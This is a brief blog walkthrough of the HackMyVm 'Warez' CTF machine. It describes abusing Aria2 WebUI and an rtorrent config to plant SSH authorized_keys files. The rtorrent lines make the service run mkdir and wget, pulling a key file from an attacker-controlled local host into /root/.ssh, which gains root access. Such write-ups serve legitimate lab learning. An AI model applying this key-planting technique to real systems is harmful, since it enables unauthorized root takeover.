Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Warez Simple Walkthrough

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez


Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.

image-20210901220643988.png


Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc 
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #
 #network.scgi.open_port = "127.0.0.1:5000"
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0